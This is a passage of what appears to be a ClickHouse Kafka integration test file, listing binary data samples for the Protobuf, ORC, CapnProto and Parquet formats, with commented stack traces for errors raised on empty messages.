# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c